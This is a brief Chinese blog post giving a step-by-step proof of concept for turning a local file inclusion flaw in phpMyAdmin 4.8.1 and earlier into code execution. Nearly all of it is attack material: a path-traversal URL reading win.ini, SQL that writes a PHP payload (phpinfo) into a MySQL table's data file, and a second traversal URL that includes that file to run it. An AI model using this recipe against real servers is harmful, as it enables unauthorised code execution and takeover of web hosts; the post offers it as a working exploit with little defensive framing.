phpmyadmin 4.8.1 本地文件包含getshell

前提

phpmyadmin版本 <= 4.8.1

POC

http://127.0.0.1/phpmyadmin_4_8_1/index.php?target=db_sql.php%253f/../../../../../../windows/win.ini

1.确定MySql位置

select @@basedir;

2.选择数据库,将shell内容写入到数据库文件中

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php phpinfo()?>');

写入的文件在:C:\XXXX\MySQL\data\数据库名称\study.MYD 文件
3.使用文件包含包含数据库文件

http://127.0.0.1/phpmyadmin_4_8_1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/study.MYD

参考连接

https://zhuanlan.zhihu.com/p/38500906

posted @ 2021-07-01 23:09  追得上的梦想  阅读(198)  评论(0编辑  收藏  举报